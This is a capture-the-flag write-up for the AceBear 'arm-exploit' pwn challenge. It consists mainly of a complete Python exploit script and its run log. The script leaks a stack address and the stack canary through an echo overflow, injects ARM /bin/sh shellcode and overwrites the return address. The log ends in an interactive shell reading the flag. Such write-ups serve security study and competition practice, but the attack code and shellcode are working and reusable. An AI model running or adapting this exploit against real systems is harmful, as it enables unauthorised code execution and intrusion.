Rating:

# **=== arm-exploit (Pwn: 13 solves / 856 pt) ===**

```
from minipwn import *
#
# The minipwn is downloaded from the following URL.
# https://github.com/inaz2/minipwn/blob/master/minipwn.py
#

#s = connect_process("./arm-exploit")
s = socket.create_connection(('armexploit.acebear.site', 3001))

shellcode = '\x01\x70\x8f\xe2\x17\xff\x2f\xe1\x04\xa7\x03\xcf\x52\x40\x07\xb4\x68\x46\x05\xb4\x69\x46\x0b\x27\x01\xdf\xc0\x46\x2f\x62\x69\x6e\x2f\x2f\x73\x68'

def Info():
recvuntil(s, "Your choice: ")
sendline(s, "1")

def Login(user, password):
recvuntil(s, "Your choice: ")
sendline(s, "2")
recvuntil(s, "Username: ")
sendline(s, user)
recvuntil(s, "password: ")
sendline(s, password)

def Echo():
recvuntil(s, "Your choice: ")
sendline(s, "3")

def Change(user):
recvuntil(s, "Your choice: ")
sendline(s, "4")
recvuntil(s, "New username: ")
sendline(s, user)

Login("root", "1111")
Info()

Change("1"*32) # Change root flag !
Change("root")
Info()

Echo()

#
# Leak Stack Address
#
recvuntil(s, "arm-exploit:~$ ")
s.send("echo "+"A"*63)
r = s.recv(67)
stack_leak_addr = u32(r[63:67])
stack_buf_addr = stack_leak_addr - 0x88
print "stack_leak_addr =", hex(stack_leak_addr)
print "stack_buf_addr =", hex(stack_buf_addr)

#
# Leak Canary
#
recvuntil(s, "arm-exploit:~$ ")
s.send("echo "+"A"*124)
r = s.recv(127)
canary = u32('\x00' + r[124:127])
print "canary = ", hex(canary)

#
# Load Shellcode
#
buf = "echo " + "BBB" + shellcode
buf = buf.ljust(128, "C")
buf += p32(canary) + "DDDD" + p32(stack_buf_addr)
s.send(buf)

#input()
recvuntil(s, "arm-exploit:~$ ")
sendline(s, "exit")

interact(s)
```

```
root@kali:# python exploit.py
stack_leak_addr = 0xf6fffb34
stack_buf_addr = 0xf6fffaac
canary = 0xa0300300
BBB?p��?�?�?�R@�hF�iF
'?��F/bin//shCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
root@arm-exploit:~$ id
uid=1000(arm_exploit) gid=1000(arm_exploit) groups=1000(arm_exploit)
cd /home/arm_exploit
cat flag
AceBear{arm_i5_my_sad_m3m0ry}
```